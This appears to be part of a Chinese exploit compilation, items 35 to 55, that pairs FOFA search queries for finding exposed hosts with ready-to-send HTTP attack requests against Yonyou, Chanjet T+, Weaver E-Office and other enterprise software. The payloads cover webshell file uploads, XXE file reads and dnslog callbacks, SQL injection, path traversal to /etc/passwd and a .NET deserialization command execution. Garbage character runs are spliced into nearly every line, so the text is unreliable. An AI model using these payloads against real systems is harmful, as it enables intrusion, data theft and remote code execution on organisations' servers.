' t' d8 c3 k  |! U% OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% J& q/ W6 S7 a/ t3 X
Content-Type: application/x-www-form-urlencoded
) }& d2 T4 g# h/ F! t" DAccept-Encoding: gzip, deflate
5 J: r: V+ @% ^: n/ DAccept: */*! N. K5 }, B) Q; }# @' P& P/ Z) x5 P
Connection: keep-alive, j2 b. E3 ~* ?3 f5 S1 |

, T% {1 X' t" F5 q5 l+ q' G' E7 w" U+ Y' p
35. 用友NC-Cloud importhttpscer任意文件上传
6 k  q' T, _4 F! sFOFA:app="用友-NC-Cloud"' q3 g% V) z0 c9 L: ~
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1- v7 U% g" X* U* Z" d: }
Host: 203.25.218.166:8888' C* ~, h( t6 y. V% h8 X
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
$ f4 }% s- R, D( jAccept-Encoding: gzip, deflate
& D; h- f% I5 b( t5 M" G8 C: L0 y1 M$ m" mAccept: */*, Z' J: E% K7 ]1 Z/ ]
Connection: close0 k* u3 N  X9 \* @
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
$ L, |' d. ^- a7 s' n* R8 Z* dContent-Length: 190  O& p7 {! ^# W+ t* r
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
6 ]( d4 N/ R( y# `! a4 Y  N, q' v, {; y( J* {9 j
--fd28cb44e829ed1c197ec3bc71748df02 l6 w0 w. Y0 J- D2 i/ S& U- v
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"! Y# a  C  [5 K# h  c

$ D* S" ]: `6 T% Z$ t4 a7 u<%out.println(1111*1111);%>
8 a  q, b0 Y" C5 o2 u& ?  H0 [--fd28cb44e829ed1c197ec3bc71748df0--5 {+ q! Q# I& c9 E7 b: I& b8 M

% y- o* Z( |5 ]$ x/ I* F( h2 @1 U$ P, H
36. 用友NC-Cloud soapFormat XXE* n1 g7 }3 B: t: v' @: X7 J
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
- J. U# J: T% [2 I. d' h+ fPOST /uapws/soapFormat.ajax HTTP/1.1
, s  ^" j) d0 w5 kHost: 192.168.40.130:8989
  z, N6 Y. `  c+ v; L+ zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0) k# h* ?( [! G
Content-Length: 263
$ [4 y5 W5 J, F/ J" D) M# Y: BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- D" s7 l( Y* Y2 q2 U; q
Accept-Encoding: gzip, deflate
- u% u% B+ G8 D8 ]) q9 m; M, rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, d3 m0 B8 ~0 ~" Q1 L' q) f0 E/ `3 O0 UConnection: close
2 I* I+ c" o$ w+ t! s: ]; \# c. f+ gContent-Type: application/x-www-form-urlencoded
, S$ n# `) t4 Y! t' L) IUpgrade-Insecure-Requests: 19 u: X4 f) `" K/ F$ d

# ~! e# h4 s% Q" cmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
( E8 }9 K8 M# y. |! n) I5 [' S+ `" h  ^& S5 l# Y- J" C
6 }% N9 r6 u  w
37. 用友NC-Cloud IUpdateService XXE
( D% U& X0 E# m7 m% y) t# PFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
/ J3 e$ |% z9 M9 [6 x8 A4 aPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
- H( p: q( ?5 N' u1 B, iHost: 192.168.40.130:8989
9 o! L8 v# [; L. QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36; d% ?# l$ D$ q, E
Content-Length: 4217 A2 X  a" L" v& j5 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& }" o- G0 G; ^
Accept-Encoding: gzip, deflate+ J* b; O; o2 k
Accept-Language: zh-CN,zh;q=0.91 t/ B8 G: I, ^1 m
Connection: close6 X2 `$ Z9 J% m0 T3 ~6 L( Y
Content-Type: text/xml;charset=UTF-8
- C# b& C6 t+ a% w1 {! _3 V3 BSOAPAction: urn:getResult$ H/ I; L0 C# k% s+ Z. C' Y* B6 d
Upgrade-Insecure-Requests: 1) x0 _% \6 b$ t3 O; G% e, A* a) C
" O& x7 F! \/ S2 R
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">+ M) Q# F1 ^$ E7 ?+ H
<soapenv:Header/>
7 V5 l( ~, j; s- W' r$ Z# g<soapenv:Body>! Z6 N4 ]" y: G2 x/ P* N
<iup:getResult>- i* N9 l, ]/ c0 X
<!--type: string-->& ~  p8 E  x: a
<iup:string><![CDATA[1 B& f. Y% \+ b/ k+ V
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>/ k( s& j# k1 ?. t  O" Z
<xxx/>]]></iup:string>7 [. N( H% G# K7 \$ s1 b. t
</iup:getResult>* Q& Y+ g2 U3 f( ~5 l* d
</soapenv:Body>6 W1 Y1 X) H7 q
</soapenv:Envelope>
. O4 F; m5 f1 p! V9 b4 o8 Q, s0 b+ d! f
+ Z! p% m+ ~) }- w! N. l3 [4 ]

9 y# c$ J0 Q0 Z38. 用友U8 Cloud smartweb2.RPC.d XXE7 A& y2 _" y3 H2 N# `. @7 ^
FOFA:app="用友-U8-Cloud"
! a9 E8 R4 n5 [POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.12 I, ~+ G7 ]& H, B: H
Host: 192.168.40.131:8088! D, n5 W9 G2 z3 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
* X' b; B& l+ L& l2 `Content-Length: 260
( E2 r0 e! r9 Y- s9 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3. x' @- E' F* M  `/ s$ x
Accept-Encoding: gzip, deflate
& K3 k" J$ l: x" i. F: r/ xAccept-Language: zh-CN,zh;q=0.9
# L2 u7 ]  d5 ~; K% c% E) @Connection: close
1 M# P$ C, S* t1 X* ?8 `Content-Type: application/x-www-form-urlencoded9 S5 e) a* G! `: |7 O, ?

8 {% f/ K* e4 h. v& r9 Q/ n( u__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>! g4 {1 n3 u7 b; Y2 V9 S

: C% ~( J3 g6 s- I4 a% N) ^* p1 B. N. K
39. 用友U8 Cloud RegisterServlet SQL注入8 d% S: c1 T, N7 r: C8 }
FOFA:title="u8c"
; s5 K" Y% X, g+ C5 ~POST /servlet/RegisterServlet HTTP/1.1. k5 Y/ f5 I$ a* j. T7 n
Host: 192.168.86.128:8089
2 `: v' r- g* P! ?( X- DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
& Q  R1 @7 l. {3 A% AConnection: close
6 V2 z7 {8 x. XContent-Length: 85* O- K8 P8 r3 d" T2 w
Accept: */*
0 L' }# q/ _2 o' e7 C( OAccept-Language: en
, C* e( z- r" V9 bContent-Type: application/x-www-form-urlencoded8 b4 ^. v! X$ P& c
X-Forwarded-For: 127.0.0.1
( s( w# M5 M/ T- M. [  O& oAccept-Encoding: gzip4 c5 Y9 g* B- T* W7 g, F
6 L! r' ^9 k5 P2 X% K$ f
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
+ \5 ]% @2 B& I  A/ w- F/ s; E  t5 _& s3 r

! d# ^( i6 Q# P3 z! U; ]40. 用友U8-Cloud XChangeServlet XXE
" h- u1 P+ |3 a% L. cFOFA:app="用友-U8-Cloud"- l: H, i2 h6 S0 \
POST /service/XChangeServlet HTTP/1.1
0 |+ b& ^) q  e% XHost: x.x.x.x
4 U$ i% F+ H$ JUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.360 n* }1 ?& T5 s% |
Content-Type: text/xml) d, P/ K% ^5 K6 f/ j$ u* L% Z0 y( s
Connection: close" q' R% s  ]) w% x4 t/ g0 h
* ^4 J& M3 A% t) z1 L" w
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
$ N  ^) V* i3 O4 E! J
2 ?( |: a6 G% x+ v; T
9 ]+ h5 L" J2 i9 B1 `41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
" Q0 G( h8 y2 q! ^+ y0 \3 ^FOFA:app="用友-U8-Cloud"
4 i  y" }5 K% {1 @7 p2 yGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.11 G0 V  |  x* |: i; u$ N
Host:- a) y' U6 t! ?/ |; F( S' A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 _2 E- a" c$ V8 dContent-Type: application/json* W2 a+ `5 J3 g; ?+ K
Accept-Encoding: gzip3 Q0 l- x! q0 \1 w" w# N
Connection: close
/ J0 C7 L* F4 E( n9 u- N8 o# U& k" K4 `2 N

, M7 {+ p. q6 h/ a1 Y8 _/ N42. 用友GRP-U8 SmartUpload01 文件上传1 P% S9 ]: V4 W+ v1 J
FOFA:app="用友-GRP-U8"# F% V1 d+ z2 f) w6 @
POST /u8qx/SmartUpload01.jsp HTTP/1.1- L8 o; i% u3 Z7 d- N
Host: x.x.x.x/ R- c; O! {6 M0 v7 M0 a, n' K( {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
8 \, z5 g1 |7 [7 ?* yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36. _8 b# S- p5 v0 j, c4 E0 }
9 K6 l4 B5 ~9 x- l& n
PAYLOAD
$ L; O) K( j* t; ^  O: Y# Z; C) t* y# e/ s0 n$ ]- m, V. |
0 C/ w3 s+ o1 e. v( i0 N$ z& @6 y. a
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
2 i5 x% h7 T. y! U7 V! J
( ^* M1 A0 J. @43. 用友GRP-U8 userInfoWeb SQL注入致RCE- t2 a- A, y3 p6 z# W! g
FOFA:app="用友-GRP-U8"8 t! g. r% ?8 ^# c8 l8 Y
POST /services/userInfoWeb HTTP/1.1
: }' t5 ]8 [" j5 v  k4 r" PHost: your-ip
. u7 J8 V% f0 c& d2 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
( ~& r. @" n& WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 R( \1 s0 J5 X
Accept-Encoding: gzip, deflate
% j5 H0 _$ t$ rAccept-Language: zh-CN,zh;q=0.9
. x- m2 w3 Y# t; y$ YConnection: close
4 q3 |- y# k, y+ C5 l7 m. s. VSOAPAction:  K% g* {# @) x& p) E# \% b
Content-Type: text/xml;charset=UTF-86 O6 O, Q7 z. [+ {2 o$ _0 p

! L! c8 Q6 _& B; x& N. v* d<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
) F' z4 O& H, L+ d9 A   <soapenv:Header/>
, t0 q0 f1 G0 G% [/ Q3 }; I4 y   <soapenv:Body>( b. |8 F- W1 u+ }* p- [- c
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
0 e' H  M: w9 i2 b/ R5 B  t         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>6 K' I4 S  c1 W) h% M/ @
      </ser:getUserNameById>
/ P( W5 `) \" B. \. y& p4 Q% Z   </soapenv:Body>
) k  W7 z( F4 `3 u/ M</soapenv:Envelope>4 \+ M: W6 i7 }) O0 e  n

1 T0 I' `$ u7 g5 D# T- C, L5 S; D3 P* s0 ^
44. 用友GRP-U8 bx_dj_check.jsp SQL注入, m% M2 I! \0 B
FOFA:app="用友-GRP-U8"
: E% L( L& {6 Z" R  lGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.16 y3 S7 w- N4 R" ?( [6 z# I
Host: your-ip# f/ E6 N" N- F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36& q7 y8 p8 Z/ u7 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 F  Y! m3 M2 S, S; O) l: r8 L. Z
Accept-Encoding: gzip, deflate
4 C* X- X6 M+ J! @Accept-Language: zh-CN,zh;q=0.9& s& z; \; [5 Z  K
Connection: close
. Q: j2 W+ C: @! _2 v' {/ n5 q8 \4 F$ }) @4 W

6 g7 X* W8 |! I: l3 U) Z7 r5 h( ]45. 用友GRP-U8 ufgovbank XXE7 m7 P$ g3 Q+ e8 v. R
FOFA:app="用友-GRP-U8"5 S" P$ j! f: t' a
POST /ufgovbank HTTP/1.1
& ], R- Y" k# U8 jHost: 192.168.40.130:222
) P- h. e& J  F. s: L/ p4 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.04 z1 u/ B2 Z: F7 z4 Y* z
Connection: close
/ D' B- a. g* R7 _- sContent-Length: 161+ ~& Y+ \4 h1 r7 }3 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ A5 c: P: H4 Y4 b+ [- l+ S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 D( p1 ~) p( \; o; NContent-Type: application/x-www-form-urlencoded# ~  i& o* T, t+ Z8 J* X& U, P) t. [
Accept-Encoding: gzip( F) g  K8 X9 v' ^8 k5 \, z
+ M* N- w+ f* z) N& C* H
reqData=<?xml version="1.0"?>3 m% Q. e% z( u: V
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
5 v+ d$ X9 T6 ?8 P2 v+ h8 h& L0 m" }! `* C) P; A
4 y) Y: K7 e% y' ?, |. H
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
# e  [) X2 @6 g, K$ w+ l7 {FOFA:app="用友-GRP-U8"+ Q( J1 G; ~. o, D
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1" J! C5 s4 ]* z' |" q% a2 b( X
Host: your-ip
/ |! U2 |# Q9 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36! Z! z' J# b4 }# {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 k- s$ a' i) C7 h$ A
Accept-Encoding: gzip, deflate
1 c: X) i9 c+ `7 }Accept-Language: zh-CN,zh;q=0.9
" r# A6 w+ b; _. A" S8 HConnection: close1 f% \: a! e* X2 }1 _

3 @2 {7 d! F, e  ^
2 }' D- t+ A: r& r' h( j* E9 B. O- u47. 用友GRP A++Cloud 政府财务云 任意文件读取1 I! ?3 Q/ f$ {
FOFA:body="/pf/portal/login/css/fonts/style.css"
0 @; u8 g# g7 P; kGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
# F" O1 O% I0 l6 x& f4 i( M* ~Host: x.x.x.x
" G% h; x9 }2 lCache-Control: max-age=0
  h" V& t$ \& C) ?. GUpgrade-Insecure-Requests: 13 S2 @9 e. X8 G; I: G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% z6 h* \# N: i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, i% M) a! @3 G. x! C3 \- N
Accept-Encoding: gzip, deflate, br
, L+ J5 w: |  x% h( [. iAccept-Language: zh-CN,zh;q=0.94 f7 K+ v' y6 H" _# n# n) i
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
0 [, A7 P! X5 J: t4 W2 IConnection: close
2 i+ c4 }- E. T- D, w
: |# Y% N: m1 u, O2 O; [4 ?- P4 |
- x# G2 i9 }, O/ V3 l
& }7 z5 s( X" `48. 用友U8 CRM swfupload 任意文件上传. H6 p2 L/ W% F7 ?8 g0 F3 v! U3 ]
FOFA:title="用友U8CRM") W- ]) L* D, I
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1' d9 @- s. ?' a# o: }
Host: your-ip
" V) u  y3 M. S8 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0( f8 h+ ?& y* S9 Z  j, T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 B  N( }) M1 t+ i% ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# w3 F- C8 y- D; qAccept-Encoding: gzip, deflate- ^* }7 @$ ~9 ^" d' s" y
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855* ~% T! z4 d. m5 l( C7 \
------269520967239406871642430066855
/ h! W- Q- d, tContent-Disposition: form-data; name="file"; filename="s.php"
1 N+ _$ p6 {4 r7 C$ S/ @% c, M# b1231' t  B5 ], Q$ ~+ y8 u; _' U" s6 @
Content-Type: application/octet-stream3 ~: q1 Z4 q0 x. i; S, z/ P, l, L
------2695209672394068716424300668552 O# l) t* e0 [* w1 n) m
Content-Disposition: form-data; name="upload"3 ]' b0 n6 F& B  p& e6 i
upload' O. ^$ z! T- M9 W
------269520967239406871642430066855--
$ i) y, U% j- z9 z4 h; j) e
/ G+ {0 C, g& Q5 Q# S! ~' A$ D- X
, o* V) g& R! f) k+ Y7 ^# @49. 用友U8 CRM系统uploadfile.php接口任意文件上传
* L0 N$ z9 }% z! j: t1 D5 c  QFOFA:body="用友U8CRM"/ n! j5 |' m# f

3 g. Z  Q- s3 ~& lPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1) W8 n0 T% @4 ]6 v' S
Host: x.x.x.x2 H8 {. q& B0 \, l7 h, F1 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
' g: F0 U# f" i4 ]) h8 J- ~& CContent-Length: 329
& Z# Y  ~+ X( LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 u# X8 s, b- ~$ a$ ^% t0 g, }9 F& N; _Accept-Encoding: gzip, deflate
$ ^1 Q) ^, C) {4 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' ~6 v* f% d' G  p
Connection: close
1 u$ r  G) z0 D+ Y4 CContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w& j; c7 P3 `  R3 v9 R
! J+ j/ A& m, j
-----------------------------vvv3wdayqv3yppdxvn3w
  K# Y/ o+ e+ a3 Q: uContent-Disposition: form-data; name="file"; filename="%s.php "
$ _; u! g1 L+ e2 o* A# ]# k) k+ o. wContent-Type: application/octet-stream. p  z: X/ M2 q8 M  M" ]* ?+ N& {" u

4 a& M5 L) N: e4 Y  X" Nwersqqmlumloqa7 O/ }) p( ]; M  Y" S' ?# O
-----------------------------vvv3wdayqv3yppdxvn3w
( g# E7 Y7 A9 sContent-Disposition: form-data; name="upload"
5 A! K" K' y0 }6 b' s
( d' _& I1 K/ b0 N- I. `: \upload
& M5 ?% F0 B$ H-----------------------------vvv3wdayqv3yppdxvn3w--0 j' D/ ~3 G! [- ^8 y

* s1 U# B7 }3 q- J4 j: j7 ?
1 l$ L- ]& L( M) `! Qhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
( W: S; ~' |8 m, U3 ?9 V4 H: j2 H9 ]" s4 A
50. QDocs Smart School 6.4.1 filterRecords SQL注入
$ u0 p0 f, X( A/ b$ BFOFA:body="close closebtnmodal") e/ G. |8 }: @; b3 e
POST /course/filterRecords/ HTTP/1.18 U( x4 A) w$ @1 A
Host: x.x.x.x
' i+ R/ F7 d/ U) `4 T7 ^* |User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
5 P: ?/ A7 u; eConnection: close
/ }/ t5 f$ i, k& E- p8 @Content-Length: 224$ }& M1 E" Y) H; I3 p& p
Accept: */*% w' ?4 i/ P( \, r3 Q( w
Accept-Language: en1 h/ O- j( \( P% `
Content-Type: application/x-www-form-urlencoded2 e1 C% N9 ~4 I; P6 s1 h
Accept-Encoding: gzip- j. p7 B7 }# N0 s
& D7 j- f# N2 k: z  X# f
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=10 }) {" G8 i0 f) X  W( t
! x. w/ |( W' b0 i: x$ T* H; u! H
& {* X- M' x' u5 R; i# ]/ h! G
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入. ]  Z/ I5 [6 g- l; }5 ~, q
FOFA:app="云时空社会化商业ERP系统"; I: ]) }  N% q) R0 |: U1 ^4 B; E7 \
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
0 _  I) S$ a8 }  X8 N7 |Host: your-ip. }' O5 }! f5 g4 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
. ]8 G2 P" F* P6 N6 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
. E, {( T) G) @% S# k! O5 p" rAccept-Encoding: gzip, deflate
: u3 J$ }, N7 D& v7 |, o; ^Accept-Language: zh-CN,zh;q=0.9
) ~1 p, v, m0 t. vConnection: close
6 d. U' z( Q  N* i" o: h5 K- S
  [& T& M+ S6 n" J2 q
8 A3 ]+ A5 X5 y$ F6 I52. 泛微E-Office json_common.php sql注入; ]* a. h6 i. d6 |. a3 c! N- N+ J
FOFA:app="泛微-EOffice"
3 x# M) ]6 U9 qPOST /building/json_common.php HTTP/1.1
7 r$ |0 d( x! G" Q) DHost: 192.168.86.128:8097# e  w) t+ u( W* y) }+ z
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( k* C" Q- n7 I: ^Connection: close# S2 v7 m5 [( m; L
Content-Length: 87
  y  F8 @4 H( p( aAccept: */*$ {7 x, b6 w; w0 O* j+ g& w1 k
Accept-Language: en- T9 X" s9 M2 b+ q
Content-Type: application/x-www-form-urlencoded- i& y* q  c, t
Accept-Encoding: gzip
% Z9 W" P  e+ }" i7 T
3 T5 s: q* q. X7 e; I2 `tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
$ J  r2 c0 O) ^9 i3 p- o
) K: \9 Q2 n  `$ H) J; O3 v! y* P; H# y7 [$ e# _" I# r4 E1 }
53. 迪普 DPTech VPN Service 任意文件上传
5 z* b. B2 b) L. D: [1 @* }FOFA:app="DPtech-SSLVPN"
% P4 E' Y: h; X8 k/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
! Z7 b8 y) Z& ?0 X
2 c! k% S' v6 y0 m7 H9 N0 h! F9 B, Q( B4 w8 m1 I
54. 畅捷通T+ getstorewarehousebystore 远程代码执行& e8 Z- S. k7 |; x- r
FOFA:app="畅捷通-TPlus"
6 I7 b7 Q5 ~2 _" B: X8 g第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
/ L0 n* v+ ]% A1 t' c6 l9 P"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
- R& N  T8 P" A2 p' x* ?4 G6 W' Z4 q! Y' I

8 @, [( _8 I8 |: r, h: i6 ?& ?1 _" X完整数据包! l; O5 Y3 {. `: F- q% B
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
1 A  {5 m4 M1 ^6 u0 @* |( B) V& |Host: x.x.x.x
5 w+ w" ^1 }1 L+ q( u! hUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
% E# Y" o* c+ b! J9 q3 X! H3 wContent-Length: 593- ^* o* {* L/ G& ~1 Y3 q

1 I& g) F+ L2 W% ~7 b{
9 Q+ a# N7 J! S6 V6 y"storeID":{! W* N6 F: P, m
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",3 I! v3 S) q" n$ K
"MethodName":"Start",5 S0 g0 x3 c4 L- E2 C# p$ I
  "ObjectInstance":{0 ~8 ?5 q- h( X2 y2 P/ t
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",) m7 L1 D; \, J% \# N. n
    "StartInfo":{
- B& ?' z6 r8 @* v   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",  s: T/ z2 b) h" q7 i
    "FileName":"cmd",
* E( D- K* L6 t3 x9 \    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
5 @2 i8 v5 u$ z! c8 U    }! o" u2 L2 n% j" v4 p' L' S
  }
0 _5 J' ?8 k+ ^  B. k- }5 K  }& x+ V- ]& l$ q* i
}
$ P/ I" J6 e0 w' h% V
8 A5 j; U4 e( j# L0 B* ?; m  L, [. U# D, X+ K. i3 J! e- d
第二步,访问如下url. Q* z$ e3 \8 f' ?4 q& A& G* F
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
( T. i. }) @/ _
4 B/ @: p# [6 b$ W$ ]/ {$ ?/ ]; p' a0 u* f3 ~) \4 s+ C* P
55. 畅捷通T+ getdecallusers信息泄露
* u, i1 T9 R7 T$ D, oFOFA:app="畅捷通-TPlus"- N4 |: W# G5 x7 b4 S$ @
第一步,通过, w, j6 ~  b+ a3 i- C7 T2 x( W
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
" b: w" r+ {0 j% N6 o: V第二步,利用获取到的Cookie请求% V9 R) z2 [. a
